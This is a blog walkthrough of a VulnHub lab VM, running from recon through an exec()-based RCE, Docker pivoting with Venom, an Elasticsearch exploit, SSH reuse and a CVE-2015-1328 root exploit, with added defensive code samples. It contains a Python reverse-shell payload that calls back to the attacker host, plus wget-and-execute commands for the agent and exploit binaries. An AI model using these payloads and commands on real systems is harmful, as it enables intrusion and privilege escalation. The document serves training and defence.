Fading Coder

One Final Commit for the Last Sprint


Penetration Testing Walkthrough: Exploiting a Social Network VM


Target Information

Target VM: medium_socnet

Source: VulnHub (https://www.vulnhub.com/entry/boredhackerblog-social-network,454/)

Initial Reconnaissance

With both the target and the attack host (Kali) on the same network segment, arp-scan was used to identify the target's IP address (the -l flag scans the local network).

arp-scan -l

From the results, 192.168.174.133 was identified as the target. A full port scan was then performed.

nmap -p- 192.168.174.133

Ports 22 and 5000 were found open. A service version detection scan was run on these ports.

nmap -p22,5000 -sV 192.168.174.133

The -sV flag in Nmap performs service version detection. It sends specific probes to open ports and analyzes responses to determine the exact service and version running. This is crucial for identifying potential vulnerabilities associated with specific software versions.

Results indicated an Ubuntu system running a Python HTTP service on port 5000.

Web Application Enumeration

The web service on port 5000 was accessed. No obvious injection points were found. A directory scan was performed using dirsearch.

dirsearch -u "http://192.168.174.133:5000/"

An admin panel path was discovered. This panel contained a feature that passed user input directly into an exec() function, leading to a Remote Code Execution (RCE) vulnerability.
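The root cause is that the panel turns user-supplied text into code. The following is an added example, not code from the VM or the original post: it places the exec() pattern next to the design that removes it, a dispatch table in which the client picks a key and the server validates every parameter. The user store and action names are constructed for the example.

```python
import re

# Constructed sample data standing in for the application's user store.
USERS = {"alice": {"banned": False}, "bob": {"banned": False}}


def vulnerable_admin_action(user_input: str):
    """The pattern behind the panel's RCE: the request body becomes a program.

    No input filter repairs this. exec() accepts any Python source, so the
    only fix is to stop handing untrusted text to it at all.
    """
    namespace = {}
    exec(user_input, {}, namespace)  # arbitrary code runs here
    return namespace.get("result")


USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{0,31}")


def list_users():
    return sorted(USERS)


def ban_user(username: str):
    # Parameters are checked against a strict pattern before any use.
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    if username not in USERS:
        raise KeyError(username)
    USERS[username]["banned"] = True
    return f"{username} banned"


# Dispatch table: the client chooses a key; the code that runs is fixed.
ADMIN_ACTIONS = {
    "list_users": (list_users, 0),
    "ban_user": (ban_user, 1),
}


def safe_admin_action(action: str, *args: str):
    if action not in ADMIN_ACTIONS:
        raise ValueError(f"unknown action: {action!r}")
    func, arity = ADMIN_ACTIONS[action]
    if len(args) != arity:
        raise ValueError("wrong number of arguments")
    return func(*args)


def handle_admin_request(action: str, *args: str):
    """Web-handler shape: (status, body) rather than an exception."""
    try:
        return 200, safe_admin_action(action, *args)
    except (ValueError, KeyError) as exc:
        return 400, str(exc)
```

The hardened handler never inspects the request for "dangerous" substrings; it simply has no path on which request text reaches an interpreter, which is the property a code review of such a panel should look for.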

Initial Foothold via RCE

A reverse shell was established using Python. First, a listener was started on the attack machine.

nc -lvvnp 6666

The following Python reverse shell payload was executed via the vulnerable web parameter.

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.174.128",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

A shell was successfully obtained.
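From the defender's side, the three dup2() calls above leave a process whose stdin, stdout and stderr all resolve to the same socket, which an interactive shell on a terminal or pipe never has. The following added example (not part of the original post) implements that host-side check: a pure function over the fd targets, which the constructed test data exercises, and a /proc walker that applies it to live processes. It assumes a Linux /proc layout.

```python
import os
import re
from typing import Dict, Iterator, Tuple

SOCKET_LINK = re.compile(r"socket:\[\d+\]")
# Process names treated as shells when restricting the sweep (assumed list).
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ash"}


def stdio_is_socket(fd_targets: Dict[int, str]) -> bool:
    """True when fds 0, 1 and 2 all point at sockets.

    fd_targets maps an fd number to the readlink() result of
    /proc/<pid>/fd/<n>, e.g. "socket:[41234]" or "/dev/pts/0".
    """
    return all(SOCKET_LINK.fullmatch(fd_targets.get(fd, "")) for fd in (0, 1, 2))


def read_fd_targets(pid: int) -> Dict[int, str]:
    targets = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:  # process gone, or not ours to inspect
            pass
    return targets


def read_comm(pid: int) -> str:
    try:
        with open(f"/proc/{pid}/comm") as f:
            return f.read().strip()
    except OSError:
        return ""


def find_socket_stdio_processes(shells_only: bool = True) -> Iterator[Tuple[int, str]]:
    """Yield (pid, comm) for processes whose standard streams are all sockets."""
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        comm = read_comm(pid)
        if shells_only and comm not in SHELL_NAMES:
            continue
        if stdio_is_socket(read_fd_targets(pid)):
            yield pid, comm


if __name__ == "__main__":
    for pid, comm in find_socket_stdio_processes():
        print(f"pid {pid} ({comm}) has socket-backed stdin/stdout/stderr")
```

Run as root to see every process; unprivileged users can only read their own fd links. Services started by inetd or by systemd socket activation with Accept=yes legitimately have a socket on stdio, which is why the sweep defaults to shell process names.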

Identifying a Docker Container

The presence of a Dockerfile suggested the shell was inside a container. Two methods confirmed this:

  1. Checking for the .dockerenv file.

ls /.dockerenv

  2. Examining the cgroup information.

cat /proc/1/cgroup

The container's internal IP was 172.17.0.3/16.
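The two checks above are the ones a post-exploitation script or a monitoring agent would also automate. The following is an added example (not from the original post) that combines them: a parser for /proc/1/cgroup lines, which can be tested on the constructed sample contents embedded below, and a wrapper that applies both checks to the live filesystem. The cgroup marker list is an assumption covering common runtimes.

```python
import os
from typing import Iterable, List, Optional

# Path fragments found in /proc/1/cgroup entries of containerised processes
# on cgroup v1 hosts (assumed list covering Docker, containerd, Kubernetes, LXC).
CONTAINER_MARKERS = ("/docker/", "/docker-", "/containerd", "/kubepods", "/lxc/", "/ecs/")


def cgroup_markers(lines: Iterable[str]) -> List[str]:
    """Return the cgroup entries whose path points at a container cgroup.

    Each line has the form "<hierarchy-id>:<controllers>:<path>"; only the
    path component is inspected, so "docker.service" on a host does not match.
    """
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split(":", 2)
        if len(parts) != 3:
            continue
        if any(marker in parts[2] for marker in CONTAINER_MARKERS):
            hits.append(line.strip())
    return hits


def detect_container(root: str = "/") -> Optional[str]:
    """Apply both checks from the walkthrough; return a reason or None.

    On cgroup v2 hosts /proc/1/cgroup is usually just "0::/" even inside a
    container, so the .dockerenv check carries the weight there.
    """
    if os.path.exists(os.path.join(root, ".dockerenv")):
        return ".dockerenv present"
    try:
        with open(os.path.join(root, "proc/1/cgroup")) as f:
            hits = cgroup_markers(f)
    except OSError:
        return None
    return f"cgroup entry {hits[0]}" if hits else None


# Constructed sample /proc/1/cgroup contents (cgroup v1 layout).
SAMPLE_CONTAINER_CGROUP = [
    "12:pids:/docker/3f4e9c0a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2",
    "11:memory:/docker/3f4e9c0a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2",
    "1:name=systemd:/docker/3f4e9c0a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2",
]
SAMPLE_HOST_CGROUP = [
    "12:pids:/init.scope",
    "11:memory:/system.slice/docker.service",  # the daemon itself, not a container
    "1:name=systemd:/init.scope",
]

if __name__ == "__main__":
    print("container sample:", cgroup_markers(SAMPLE_CONTAINER_CGROUP))
    print("host sample:", cgroup_markers(SAMPLE_HOST_CGROUP))
    print("this machine:", detect_container())
```

Neither check is conclusive on its own: .dockerenv can be removed from an image, and cgroup v2 hides the container id, so treat a positive as a strong hint rather than proof.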

Internal Network Discovery

The internal Docker network (172.17.0.0/16) was probed to find other hosts.

for ip in $(seq 1 10); do ping -c 1 172.17.0.$ip; done

This Bash loop pings IP addresses from 172.17.0.1 to 172.17.0.10. The ping -c 1 command sends a single ICMP echo request to each address. Hosts at 172.17.0.1 and 172.17.0.2 responded.

Pivoting with a Tunnel

To route traffic into this internal network, Venom (v1.1.0) was used to establish a tunnel.

  1. The Venom server was started on the attack host (Kali) on port 9999.
  2. An HTTP server was started on Kali to host the Venom agent.

python3 -m http.server 80

  3. From the compromised container, the agent was downloaded and executed.

wget http://192.168.174.128/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.174.128 -rport 9999

  4. On the Kali server session, the connection was accepted and a SOCKS5 proxy was started on port 1080.

goto 1
socks 1080

  5. proxychains4 was configured to route tools through this proxy by editing /etc/proxychains4.conf.

Internal Service Enumeration

With the proxy active, internal hosts were scanned.

proxychains nmap -Pn -sT -sV 172.17.0.1
proxychains nmap -Pn -sT -sV 172.17.0.2
  • -Pn: Skips host discovery (no ping).
  • -sT: Uses a full TCP connect scan.
  • -sV: Performs service version detection.

Host 172.17.0.2 was running Elasticsearch on port 9200.

Exploiting Elasticsearch

Searchsploit was used to find Elasticsearch exploits.

searchsploit elasticsearch

A relevant Python 2 exploit was copied and executed through the proxy.

cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
proxychains python2 36337.py 172.17.0.2

The exploit succeeded, yielding a file containing a hashed password. The hash was cracked using an online service (e.g., Somd5), revealing the password for a user john.

Lateral Movement via SSH

The credentials were used to SSH into the host at 172.17.0.1 (the original target's internal interface).

proxychains ssh john@172.17.0.1

Access was gained as the john user.

Privilege Escalation

The kernel version was checked and found to be vulnerable.

searchsploit "Linux 3.13.0" ubuntu

A local privilege escalation exploit (CVE-2015-1328) was identified. The exploit code (37292.c) required compilation. As the target lacked gcc, it was compiled on Kali.

gcc -o privilege_escalation 37292.c

A required shared library (ofs-lib.so) was located and copied.

cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

Both files were hosted via a Python HTTP server and downloaded to the target's /tmp directory.

# On Kali
python3 -m http.server 80

# On target (as john)
cd /tmp
wget http://192.168.174.128/privilege_escalation
wget http://192.168.174.128/ofs-lib.so
chmod +x privilege_escalation
./privilege_escalation

The exploit executed successfully, granting root access.
